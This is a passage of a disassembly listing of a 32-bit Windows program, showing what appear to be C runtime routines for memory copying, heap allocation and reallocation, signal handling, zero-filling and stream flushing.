arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 1Ch
		mov	[ebp+var_C], edi
		mov	[ebp+var_8], esi
		mov	[ebp+var_4], ebx
		mov	ebx, [ebp+arg_4]
		mov	eax, ebx
		cdq
		mov	ecx, eax
		mov	eax, [ebp+arg_0]
		xor	ecx, edx
		sub	ecx, edx
		and	ecx, 0Fh
		xor	ecx, edx
		sub	ecx, edx
		cdq
		mov	edi, eax
		xor	edi, edx
		sub	edi, edx
		and	edi, 0Fh
		xor	edi, edx
		sub	edi, edx
		mov	edx, ecx
		or	edx, edi
		jnz	short loc_40DEAF
		mov	esi, [ebp+arg_8]
		mov	ecx, esi
		and	ecx, 7Fh
		mov	[ebp+var_18], ecx
		cmp	esi, ecx
		jz	short loc_40DE87
		sub	esi, ecx
		push	esi
		push	ebx
		push	eax
		call	sub_40DDA5
		add	esp, 0Ch
		mov	eax, [ebp+arg_0]
		mov	ecx, [ebp+var_18]

loc_40DE87:				; CODE XREF: sub_40DE2C+46j
		test	ecx, ecx
		jz	short loc_40DF02
		mov	ebx, [ebp+arg_8]
		mov	edx, [ebp+arg_4]
		add	edx, ebx
		sub	edx, ecx
		mov	[ebp+var_14], edx
		add	ebx, eax
		sub	ebx, ecx
		mov	[ebp+var_10], ebx
		mov	esi, [ebp+var_14]
		mov	edi, [ebp+var_10]
		mov	ecx, [ebp+var_18]
		rep movsb
		mov	eax, [ebp+arg_0]
		jmp	short loc_40DF02
; ---------------------------------------------------------------------------

loc_40DEAF:				; CODE XREF: sub_40DE2C+37j
		cmp	ecx, edi
		jnz	short loc_40DEE8
		neg	ecx
		add	ecx, 10h
		mov	[ebp+var_1C], ecx
		mov	esi, [ebp+arg_4]
		mov	edi, [ebp+arg_0]
		mov	ecx, [ebp+var_1C]
		rep movsb
		mov	ecx, [ebp+arg_0]
		add	ecx, [ebp+var_1C]
		mov	edx, [ebp+arg_4]
		add	edx, [ebp+var_1C]
		mov	eax, [ebp+arg_8]
		sub	eax, [ebp+var_1C]
		push	eax
		push	edx
		push	ecx
		call	sub_40DE2C
		add	esp, 0Ch
		mov	eax, [ebp+arg_0]
		jmp	short loc_40DF02
; ---------------------------------------------------------------------------

loc_40DEE8:				; CODE XREF: sub_40DE2C+85j
		mov	esi, [ebp+arg_4]
		mov	edi, [ebp+arg_0]
		mov	ecx, [ebp+arg_8]
		mov	edx, ecx
		shr	ecx, 2
		rep movsd
		mov	ecx, edx
		and	ecx, 3
		rep movsb
		mov	eax, [ebp+arg_0]

loc_40DF02:				; CODE XREF: sub_40DE2C+5Dj
					; sub_40DE2C+81j ...
		mov	ebx, [ebp+var_4]
		mov	esi, [ebp+var_8]
		mov	edi, [ebp+var_C]
		mov	esp, ebp
		pop	ebp
		retn
sub_40DE2C	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40DF0F	proc near		; CODE XREF: sub_407D3A+Ep

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

; FUNCTION CHUNK AT 0040E014 SIZE 00000019 BYTES

		push	0Ch
		push	offset dword_422D30
		call	__SEH_prolog4
		mov	ecx, [ebp+arg_0]
		xor	edi, edi
		cmp	ecx, edi
		jbe	short loc_40DF52
		push	0FFFFFFE0h
		pop	eax
		xor	edx, edx
		div	ecx
		cmp	eax, [ebp+arg_4]
		sbb	eax, eax
		inc	eax
		jnz	short loc_40DF52
		call	sub_405D93
		mov	dword ptr [eax], 0Ch
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	sub_4034C7
		add	esp, 14h

loc_40DF4B:				; CODE XREF: sub_40DF0F+E6j
					; sub_40DF0F+F2j
		xor	eax, eax
		jmp	loc_40E027
; ---------------------------------------------------------------------------

loc_40DF52:				; CODE XREF: sub_40DF0F+13j
					; sub_40DF0F+22j
		imul	ecx, [ebp+arg_4]
		mov	esi, ecx
		mov	[ebp+arg_0], esi
		cmp	esi, edi
		jnz	short loc_40DF62
		xor	esi, esi
		inc	esi

loc_40DF62:				; CODE XREF: sub_40DF0F+4Ej
					; sub_40DF0F+DBj
		xor	ebx, ebx
		mov	[ebp+var_1C], ebx
		cmp	esi, 0FFFFFFE0h
		ja	short loc_40DFD5
		cmp	dword_439014, 3
		jnz	short loc_40DFC0
		add	esi, 0Fh
		and	esi, 0FFFFFFF0h
		mov	[ebp+arg_4], esi
		mov	eax, [ebp+arg_0]
		cmp	eax, dword_439004
		ja	short loc_40DFC0
		push	4
		call	sub_405FB7
		pop	ecx
		mov	[ebp+ms_exc.disabled], edi
		push	[ebp+arg_0]
		call	sub_4068B9
		pop	ecx
		mov	[ebp+var_1C], eax
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40E00B
		mov	ebx, [ebp+var_1C]
		cmp	ebx, edi
		jz	short loc_40DFC4
		push	[ebp+arg_0]
		push	edi
		push	ebx
		call	sub_408130
		add	esp, 0Ch

loc_40DFC0:				; CODE XREF: sub_40DF0F+64j
					; sub_40DF0F+78j
		cmp	ebx, edi
		jnz	short loc_40E025

loc_40DFC4:				; CODE XREF: sub_40DF0F+A2j
		push	esi
		push	8
		push	dword_428A88
		call	ds:dword_41E110	; RtlAllocateHeap
		mov	ebx, eax

loc_40DFD5:				; CODE XREF: sub_40DF0F+5Bj
		cmp	ebx, edi
		jnz	short loc_40E025
		cmp	dword_428E0C, edi
		jz	short loc_40E014
		push	esi
		call	sub_408622
		pop	ecx
		test	eax, eax
		jnz	loc_40DF62
		mov	eax, [ebp+arg_8]
		cmp	eax, edi
		jz	loc_40DF4B
		mov	dword ptr [eax], 0Ch
		jmp	loc_40DF4B
sub_40DF0F	endp


; =============== S U B	R O U T	I N E =======================================



sub_40E006	proc near		; DATA XREF: zcrshv4o:00422D48o
		xor	edi, edi
		mov	esi, [ebp+0Ch]
sub_40E006	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40E00B	proc near		; CODE XREF: sub_40DF0F+98p
		push	4
		call	sub_405EDF
		pop	ecx
		retn
sub_40E00B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_40DF0F

loc_40E014:				; CODE XREF: sub_40DF0F+D0j
		cmp	ebx, edi
		jnz	short loc_40E025
		mov	eax, [ebp+arg_8]
		cmp	eax, edi
		jz	short loc_40E025
		mov	dword ptr [eax], 0Ch

loc_40E025:				; CODE XREF: sub_40DF0F+B3j
					; sub_40DF0F+C8j ...
		mov	eax, ebx

loc_40E027:				; CODE XREF: sub_40DF0F+3Ej
		call	__SEH_epilog4
		retn
; END OF FUNCTION CHUNK	FOR sub_40DF0F

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40E02D	proc near		; CODE XREF: sub_407D82+Cp
					; sub_40E248+3Ep

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

; FUNCTION CHUNK AT 0040E17A SIZE 000000CE BYTES

		push	10h
		push	offset dword_422D50
		call	__SEH_prolog4
		mov	ebx, [ebp+arg_0]
		test	ebx, ebx
		jnz	short loc_40E04E
		push	[ebp+arg_4]
		call	sub_403C6E
		pop	ecx
		jmp	loc_40E21A
; ---------------------------------------------------------------------------

loc_40E04E:				; CODE XREF: sub_40E02D+11j
		mov	esi, [ebp+arg_4]
		test	esi, esi
		jnz	short loc_40E061
		push	ebx
		call	sub_403B91
		pop	ecx
		jmp	loc_40E218
; ---------------------------------------------------------------------------

loc_40E061:				; CODE XREF: sub_40E02D+26j
		cmp	dword_439014, 3
		jnz	loc_40E201

loc_40E06E:				; CODE XREF: sub_40E02D+169j
		xor	edi, edi
		mov	[ebp+var_1C], edi
		cmp	esi, 0FFFFFFE0h
		ja	loc_40E206
		push	4
		call	sub_405FB7
		pop	ecx
		mov	[ebp+ms_exc.disabled], edi
		push	ebx
		call	sub_4060E5
		pop	ecx
		mov	[ebp+var_20], eax
		cmp	eax, edi
		jz	loc_40E137
		cmp	esi, dword_439004
		ja	short loc_40E0EA
		push	esi
		push	ebx
		push	eax
		call	sub_4065DA
		add	esp, 0Ch
		test	eax, eax
		jz	short loc_40E0B5
		mov	[ebp+var_1C], ebx
		jmp	short loc_40E0EA
; ---------------------------------------------------------------------------

loc_40E0B5:				; CODE XREF: sub_40E02D+81j
		push	esi
		call	sub_4068B9
		pop	ecx
		mov	[ebp+var_1C], eax
		cmp	eax, edi
		jz	short loc_40E0EA
		mov	eax, [ebx-4]
		dec	eax
		cmp	eax, esi
		jb	short loc_40E0CD
		mov	eax, esi

loc_40E0CD:				; CODE XREF: sub_40E02D+9Cj
		push	eax
		push	ebx
		push	[ebp+var_1C]
		call	sub_4081B0
		push	ebx
		call	sub_4060E5
		mov	[ebp+var_20], eax
		push	ebx
		push	eax
		call	sub_406110
		add	esp, 18h

loc_40E0EA:				; CODE XREF: sub_40E02D+72j
					; sub_40E02D+86j ...
		cmp	[ebp+var_1C], edi
		jnz	short loc_40E137
		cmp	esi, edi
		jnz	short loc_40E0F9
		xor	esi, esi
		inc	esi
		mov	[ebp+arg_4], esi

loc_40E0F9:				; CODE XREF: sub_40E02D+C4j
		add	esi, 0Fh
		and	esi, 0FFFFFFF0h
		mov	[ebp+arg_4], esi
		push	esi
		push	edi
		push	dword_428A88
		call	ds:dword_41E110	; RtlAllocateHeap
		mov	[ebp+var_1C], eax
		cmp	eax, edi
		jz	short loc_40E137
		mov	eax, [ebx-4]
		dec	eax
		cmp	eax, esi
		jb	short loc_40E121
		mov	eax, esi

loc_40E121:				; CODE XREF: sub_40E02D+F0j
		push	eax
		push	ebx
		push	[ebp+var_1C]
		call	sub_4081B0
		push	ebx
		push	[ebp+var_20]
		call	sub_406110
		add	esp, 14h

loc_40E137:				; CODE XREF: sub_40E02D+66j
					; sub_40E02D+C0j ...
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40E171
		cmp	[ebp+var_20], 0
		jnz	short loc_40E17A
		test	esi, esi
		jnz	short loc_40E14E
		inc	esi

loc_40E14E:				; CODE XREF: sub_40E02D+11Ej
		add	esi, 0Fh
		and	esi, 0FFFFFFF0h
		mov	[ebp+arg_4], esi
		push	esi
		push	ebx
		push	0
		push	dword_428A88
		call	ds:off_41E150
		mov	edi, eax
		jmp	short loc_40E17D
sub_40E02D	endp


; =============== S U B	R O U T	I N E =======================================



sub_40E16B	proc near		; DATA XREF: zcrshv4o:00422D68o
		mov	esi, [ebp+0Ch]
		mov	ebx, [ebp+8]
sub_40E16B	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40E171	proc near		; CODE XREF: sub_40E02D+111p
		push	4
		call	sub_405EDF
		pop	ecx
		retn
sub_40E171	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_40E02D

loc_40E17A:				; CODE XREF: sub_40E02D+11Aj
		mov	edi, [ebp+var_1C]

loc_40E17D:				; CODE XREF: sub_40E02D+13Cj
		test	edi, edi
		jnz	loc_40E244
		cmp	dword_428E0C, edi
		jz	short loc_40E1B9
		push	esi
		call	sub_408622
		pop	ecx
		test	eax, eax
		jnz	loc_40E06E
		call	sub_405D93
		cmp	[ebp+var_20], edi
		jnz	short loc_40E212

loc_40E1A6:				; CODE XREF: sub_40E02D+1F8j
		mov	esi, eax
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		push	eax
		call	sub_405D58
		pop	ecx
		mov	[esi], eax
		jmp	short loc_40E218
; ---------------------------------------------------------------------------

loc_40E1B9:				; CODE XREF: sub_40E02D+15Ej
		test	edi, edi
		jnz	loc_40E244
		call	sub_405D93
		cmp	[ebp+var_20], edi
		jz	short loc_40E233
		mov	dword ptr [eax], 0Ch
		jmp	short loc_40E244
; ---------------------------------------------------------------------------

loc_40E1D3:				; CODE XREF: sub_40E02D+1D7j
		test	esi, esi
		jnz	short loc_40E1D8
		inc	esi

loc_40E1D8:				; CODE XREF: sub_40E02D+1A8j
		push	esi
		push	ebx
		push	0
		push	dword_428A88
		call	ds:off_41E150
		mov	edi, eax
		test	edi, edi
		jnz	short loc_40E244
		cmp	dword_428E0C, eax
		jz	short loc_40E22A
		push	esi
		call	sub_408622
		pop	ecx
		test	eax, eax
		jz	short loc_40E220

loc_40E201:				; CODE XREF: sub_40E02D+3Bj
		cmp	esi, 0FFFFFFE0h
		jbe	short loc_40E1D3

loc_40E206:				; CODE XREF: sub_40E02D+49j
		push	esi
		call	sub_408622
		pop	ecx
		call	sub_405D93

loc_40E212:				; CODE XREF: sub_40E02D+177j
		mov	dword ptr [eax], 0Ch

loc_40E218:				; CODE XREF: sub_40E02D+2Fj
					; sub_40E02D+18Aj
		xor	eax, eax

loc_40E21A:				; CODE XREF: sub_40E02D+1Cj
					; sub_40E02D+219j
		call	__SEH_epilog4
		retn
; ---------------------------------------------------------------------------

loc_40E220:				; CODE XREF: sub_40E02D+1D2j
		call	sub_405D93
		jmp	loc_40E1A6
; ---------------------------------------------------------------------------

loc_40E22A:				; CODE XREF: sub_40E02D+1C7j
		test	edi, edi
		jnz	short loc_40E244
		call	sub_405D93

loc_40E233:				; CODE XREF: sub_40E02D+19Cj
		mov	esi, eax
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		push	eax
		call	sub_405D58
		mov	[esi], eax
		pop	ecx

loc_40E244:				; CODE XREF: sub_40E02D+152j
					; sub_40E02D+18Ej ...
		mov	eax, edi
		jmp	short loc_40E21A
; END OF FUNCTION CHUNK	FOR sub_40E02D

; =============== S U B	R O U T	I N E =======================================



sub_40E248	proc near		; CODE XREF: sub_407DCD+10p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		mov	ecx, [esp+arg_4]
		push	esi
		xor	esi, esi
		cmp	ecx, esi
		jbe	short loc_40E27C
		push	0FFFFFFE0h
		xor	edx, edx
		pop	eax
		div	ecx
		cmp	eax, [esp+4+arg_8]
		jnb	short loc_40E27C
		call	sub_405D93
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 0Ch
		call	sub_4034C7
		add	esp, 14h
		xor	eax, eax
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_40E27C:				; CODE XREF: sub_40E248+9j
					; sub_40E248+16j
		imul	ecx, [esp+4+arg_8]
		push	ecx
		push	[esp+8+arg_0]
		call	sub_40E02D
		pop	ecx
		pop	ecx
		pop	esi
		retn
sub_40E248	endp


; =============== S U B	R O U T	I N E =======================================



sub_40E28F	proc near		; CODE XREF: sub_4080D9+27p

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		mov	dword_428F44, eax
		mov	dword_428F48, eax
		mov	dword_428F4C, eax
		mov	dword_428F50, eax
		retn
sub_40E28F	endp


; =============== S U B	R O U T	I N E =======================================



sub_40E2A8	proc near		; CODE XREF: sub_40E2E9+5Ap

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		mov	ecx, dword_424E44
		push	esi

loc_40E2B3:				; CODE XREF: sub_40E2A8+1Ej
		cmp	[eax+4], edx
		jz	short loc_40E2C8
		mov	esi, ecx
		imul	esi, 0Ch
		add	esi, [esp+4+arg_0]
		add	eax, 0Ch
		cmp	eax, esi
		jb	short loc_40E2B3

loc_40E2C8:				; CODE XREF: sub_40E2A8+Ej
		imul	ecx, 0Ch
		add	ecx, [esp+4+arg_0]
		pop	esi
		cmp	eax, ecx
		jnb	short loc_40E2D9
		cmp	[eax+4], edx
		jz	short locret_40E2DB

loc_40E2D9:				; CODE XREF: sub_40E2A8+2Aj
		xor	eax, eax

locret_40E2DB:				; CODE XREF: sub_40E2A8+2Fj
		retn
sub_40E2A8	endp


; =============== S U B	R O U T	I N E =======================================



sub_40E2DC	proc near		; CODE XREF: sub_41077D:loc_4107AAp
		push	dword_428F4C
		call	sub_405753
		pop	ecx
		retn
sub_40E2DC	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40E2E9	proc near		; CODE XREF: sub_41077D+38p

var_30		= dword	ptr -30h
var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

; FUNCTION CHUNK AT 0040E493 SIZE 00000006 BYTES

		push	20h
		push	offset dword_422D70
		call	__SEH_prolog4
		xor	edi, edi
		mov	[ebp+var_1C], edi
		mov	[ebp+var_28], edi
		mov	ebx, [ebp+arg_0]
		cmp	ebx, 0Bh
		jg	short loc_40E351
		jz	short loc_40E31C
		mov	eax, ebx
		push	2
		pop	ecx
		sub	eax, ecx
		jz	short loc_40E332
		sub	eax, ecx
		jz	short loc_40E31C
		sub	eax, ecx
		jz	short loc_40E37C
		sub	eax, ecx
		jnz	short loc_40E360

loc_40E31C:				; CODE XREF: sub_40E2E9+1Cj
					; sub_40E2E9+29j
		call	sub_4058DA
		mov	edi, eax
		mov	[ebp+var_28], edi
		test	edi, edi
		jnz	short loc_40E33E

loc_40E32A:				; CODE XREF: sub_40E2E9+91j
		or	eax, 0FFFFFFFFh
		jmp	loc_40E493
; ---------------------------------------------------------------------------

loc_40E332:				; CODE XREF: sub_40E2E9+25j
		mov	esi, offset dword_428F44
		mov	eax, dword_428F44
		jmp	short loc_40E39E
; ---------------------------------------------------------------------------

loc_40E33E:				; CODE XREF: sub_40E2E9+3Fj
		push	dword ptr [edi+5Ch]
		mov	edx, ebx
		call	sub_40E2A8
		mov	esi, eax
		add	esi, 8
		mov	eax, [esi]
		jmp	short loc_40E3AB
; ---------------------------------------------------------------------------

loc_40E351:				; CODE XREF: sub_40E2E9+1Aj
		mov	eax, ebx
		sub	eax, 0Fh
		jz	short loc_40E394
		sub	eax, 6
		jz	short loc_40E388
		dec	eax
		jz	short loc_40E37C

loc_40E360:				; CODE XREF: sub_40E2E9+31j
		call	sub_405D93
		mov	dword ptr [eax], 16h
		xor	eax, eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		call	sub_4034C7
		add	esp, 14h
		jmp	short loc_40E32A
; ---------------------------------------------------------------------------

loc_40E37C:				; CODE XREF: sub_40E2E9+2Dj
					; sub_40E2E9+75j
		mov	esi, offset dword_428F4C
		mov	eax, dword_428F4C
		jmp	short loc_40E39E
; ---------------------------------------------------------------------------

loc_40E388:				; CODE XREF: sub_40E2E9+72j
		mov	esi, offset dword_428F48
		mov	eax, dword_428F48
		jmp	short loc_40E39E
; ---------------------------------------------------------------------------

loc_40E394:				; CODE XREF: sub_40E2E9+6Dj
		mov	esi, offset dword_428F50
		mov	eax, dword_428F50

loc_40E39E:				; CODE XREF: sub_40E2E9+53j
					; sub_40E2E9+9Dj ...
		mov	[ebp+var_1C], 1
		push	eax
		call	sub_405753

loc_40E3AB:				; CODE XREF: sub_40E2E9+66j
		mov	[ebp+var_20], eax
		pop	ecx
		xor	eax, eax
		cmp	[ebp+var_20], 1
		jz	loc_40E493
		cmp	[ebp+var_20], eax
		jnz	short loc_40E3C7
		push	3
		call	sub_4080AA

loc_40E3C7:				; CODE XREF: sub_40E2E9+D5j
		cmp	[ebp+var_1C], eax
		jz	short loc_40E3D3
		push	eax
		call	sub_405FB7
		pop	ecx

loc_40E3D3:				; CODE XREF: sub_40E2E9+E1j
		xor	eax, eax
		mov	[ebp+ms_exc.disabled], eax
		cmp	ebx, 8
		jz	short loc_40E3E7
		cmp	ebx, 0Bh
		jz	short loc_40E3E7
		cmp	ebx, 4
		jnz	short loc_40E402

loc_40E3E7:				; CODE XREF: sub_40E2E9+F2j
					; sub_40E2E9+F7j
		mov	ecx, [edi+60h]
		mov	[ebp+var_2C], ecx
		mov	[edi+60h], eax
		cmp	ebx, 8
		jnz	short loc_40E435
		mov	ecx, [edi+64h]
		mov	[ebp+var_30], ecx
		mov	dword ptr [edi+64h], 8Ch

loc_40E402:				; CODE XREF: sub_40E2E9+FCj
		cmp	ebx, 8
		jnz	short loc_40E435
		mov	ecx, dword_424E38
		mov	[ebp+var_24], ecx

loc_40E410:				; CODE XREF: sub_40E2E9+14Aj
		mov	ecx, dword_424E3C
		mov	edx, dword_424E38
		add	ecx, edx
		cmp	[ebp+var_24], ecx
		jge	short loc_40E43C
		mov	ecx, [ebp+var_24]
		imul	ecx, 0Ch
		mov	edx, [edi+5Ch]
		mov	[ecx+edx+8], eax
		inc	[ebp+var_24]
		jmp	short loc_40E410
; ---------------------------------------------------------------------------

loc_40E435:				; CODE XREF: sub_40E2E9+10Aj
					; sub_40E2E9+11Cj
		call	sub_40574A
		mov	[esi], eax

loc_40E43C:				; CODE XREF: sub_40E2E9+138j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40E45D
		cmp	ebx, 8
		jnz	short sub_40E46C
		push	dword ptr [edi+64h]
		push	ebx
		call	[ebp+var_20]
		pop	ecx
		jmp	short loc_40E470
sub_40E2E9	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40E457	proc near		; DATA XREF: zcrshv4o:00422D88o
		mov	ebx, [ebp+8]
		mov	edi, [ebp-28h]
sub_40E457	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40E45D	proc near		; CODE XREF: sub_40E2E9+15Ap
		cmp	dword ptr [ebp-1Ch], 0
		jz	short locret_40E46B
		push	0
		call	sub_405EDF
		pop	ecx

locret_40E46B:				; CODE XREF: sub_40E45D+4j
		retn
sub_40E45D	endp


; =============== S U B	R O U T	I N E =======================================



sub_40E46C	proc near		; CODE XREF: sub_40E2E9+162j
		push	ebx
		call	dword ptr [ebp-20h]

loc_40E470:				; CODE XREF: sub_40E2E9+16Cj
		pop	ecx
		cmp	ebx, 8
		jz	short loc_40E480
		cmp	ebx, 0Bh
		jz	short loc_40E480
		cmp	ebx, 4
		jnz	short loc_40E491

loc_40E480:				; CODE XREF: sub_40E46C+8j
					; sub_40E46C+Dj
		mov	eax, [ebp-2Ch]
		mov	[edi+60h], eax
		cmp	ebx, 8
		jnz	short loc_40E491
		mov	eax, [ebp-30h]
		mov	[edi+64h], eax

loc_40E491:				; CODE XREF: sub_40E46C+12j
					; sub_40E46C+1Dj
		xor	eax, eax
sub_40E46C	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_40E2E9

loc_40E493:				; CODE XREF: sub_40E2E9+44j
					; sub_40E2E9+CCj
		call	__SEH_epilog4
		retn
; END OF FUNCTION CHUNK	FOR sub_40E2E9

; =============== S U B	R O U T	I N E =======================================



sub_40E499	proc near		; CODE XREF: sub_4080D9+21p

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		mov	dword_428F58, eax
		retn
sub_40E499	endp


; =============== S U B	R O U T	I N E =======================================



sub_40E4A3	proc near		; CODE XREF: sub_4080D9+1Bp

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		mov	dword_428F64, eax
		retn
sub_40E4A3	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40E4AD	proc near		; CODE XREF: sub_40E504+31p

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 4
		mov	[ebp+var_4], edi
		mov	edi, [ebp+arg_0]
		mov	ecx, [ebp+arg_4]
		shr	ecx, 7
		pxor	xmm0, xmm0
		jmp	short loc_40E4CD
; ---------------------------------------------------------------------------
		db 8Dh,	0A4h, 24h, 4 dup(0)
		db 90h
; ---------------------------------------------------------------------------

loc_40E4CD:				; CODE XREF: sub_40E4AD+16j
					; sub_40E4AD+4Ej
		movdqa	oword ptr [edi], xmm0
		movdqa	oword ptr [edi+10h], xmm0
		movdqa	oword ptr [edi+20h], xmm0
		movdqa	oword ptr [edi+30h], xmm0
		movdqa	oword ptr [edi+40h], xmm0
		movdqa	oword ptr [edi+50h], xmm0
		movdqa	oword ptr [edi+60h], xmm0
		movdqa	oword ptr [edi+70h], xmm0
		lea	edi, [edi+80h]
		dec	ecx
		jnz	short loc_40E4CD
		mov	edi, [ebp+var_4]
		mov	esp, ebp
		pop	ebp
		retn
sub_40E4AD	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40E504	proc near		; CODE XREF: sub_408130+27j
					; sub_40E504+7Dp

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		mov	[ebp+var_4], edi
		mov	eax, [ebp+arg_0]
		cdq
		mov	edi, eax
		xor	edi, edx
		sub	edi, edx
		and	edi, 0Fh
		xor	edi, edx
		sub	edi, edx
		test	edi, edi
		jnz	short loc_40E55E
		mov	ecx, [ebp+arg_8]
		mov	edx, ecx
		and	edx, 7Fh
		mov	[ebp+var_C], edx
		cmp	ecx, edx
		jz	short loc_40E543
		sub	ecx, edx
		push	ecx
		push	eax
		call	sub_40E4AD
		add	esp, 8
		mov	eax, [ebp+arg_0]
		mov	edx, [ebp+var_C]

loc_40E543:				; CODE XREF: sub_40E504+2Bj
		test	edx, edx
		jz	short loc_40E58C
		add	eax, [ebp+arg_8]
		sub	eax, edx
		mov	[ebp+var_8], eax
		xor	eax, eax
		mov	edi, [ebp+var_8]
		mov	ecx, [ebp+var_C]
		rep stosb
		mov	eax, [ebp+arg_0]
		jmp	short loc_40E58C
; ---------------------------------------------------------------------------

loc_40E55E:				; CODE XREF: sub_40E504+1Cj
		neg	edi
		add	edi, 10h
		mov	[ebp+var_10], edi
		xor	eax, eax
		mov	edi, [ebp+arg_0]
		mov	ecx, [ebp+var_10]
		rep stosb
		mov	eax, [ebp+var_10]
		mov	ecx, [ebp+arg_0]
		mov	edx, [ebp+arg_8]
		add	ecx, eax
		sub	edx, eax
		push	edx
		push	0
		push	ecx
		call	sub_40E504
		add	esp, 0Ch
		mov	eax, [ebp+arg_0]

loc_40E58C:				; CODE XREF: sub_40E504+41j
					; sub_40E504+58j
		mov	edi, [ebp+var_4]
		mov	esp, ebp
		pop	ebp
		retn
sub_40E504	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40E593	proc near		; CODE XREF: sub_4086FB+Ep

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h

		push	10h
		push	offset dword_422D90
		call	__SEH_prolog4
		xor	ebx, ebx
		mov	[ebp+var_1C], ebx
		push	1
		call	sub_405FB7
		pop	ecx
		mov	[ebp+ms_exc.disabled], ebx
		push	3
		pop	edi

loc_40E5B2:				; CODE XREF: sub_40E593+7Fj
		mov	[ebp+var_20], edi
		cmp	edi, dword_438FE0
		jge	short loc_40E614
		mov	esi, edi
		shl	esi, 2
		mov	eax, dword_437FC0
		add	eax, esi
		cmp	[eax], ebx
		jz	short loc_40E611
		mov	eax, [eax]
		test	byte ptr [eax+0Ch], 83h
		jz	short loc_40E5E4
		push	eax
		call	sub_403A52
		pop	ecx
		cmp	eax, 0FFFFFFFFh
		jz	short loc_40E5E4
		inc	[ebp+var_1C]

loc_40E5E4:				; CODE XREF: sub_40E593+40j
					; sub_40E593+4Cj
		cmp	edi, 14h
		jl	short loc_40E611
		mov	eax, dword_437FC0
		mov	eax, [esi+eax]
		add	eax, 20h
		push	eax
		call	ds:off_41E16C
		mov	eax, dword_437FC0
		push	dword ptr [esi+eax]
		call	sub_403B91
		pop	ecx
		mov	eax, dword_437FC0
		mov	[esi+eax], ebx

loc_40E611:				; CODE XREF: sub_40E593+38j
					; sub_40E593+54j
		inc	edi
		jmp	short loc_40E5B2
; ---------------------------------------------------------------------------

loc_40E614:				; CODE XREF: sub_40E593+28j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40E629
		mov	eax, [ebp+var_1C]
		call	__SEH_epilog4
		retn
sub_40E593	endp


; =============== S U B	R O U T	I N E =======================================



sub_40E629	proc near		; CODE XREF: sub_40E593+88p
					; DATA XREF: zcrshv4o:00422DA8o
		push	1
		call	sub_405EDF
		pop	ecx
		retn
sub_40E629	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40E632	proc near		; CODE XREF: sub_40EC70+72p

var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= byte ptr -4
var_3		= byte ptr -3
var_2		= byte ptr -2
var_1		= byte ptr -1
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		sub	esp, 28h
		push	ebx
		push	esi
		xor	ebx, ebx
		test	byte ptr [ebp+arg_8], 80h
		push	edi
		push	10h
		mov	esi, eax
		mov	[ebp+var_14], ebx
		mov	[ebp+var_18], ebx
		mov	[ebp+var_2], bl
		mov	[ebp+var_28], 0Ch
		mov	[ebp+var_24], ebx
		pop	edi
		jz	short loc_40E664
		mov	[ebp+var_20], ebx
		mov	[ebp+var_1], 10h
		jmp	short loc_40E66E
; ---------------------------------------------------------------------------

loc_40E664:				; CODE XREF: sub_40E632+27j
		mov	[ebp+var_20], 1
		mov	[ebp+var_1], bl

loc_40E66E:				; CODE XREF: sub_40E632+30j
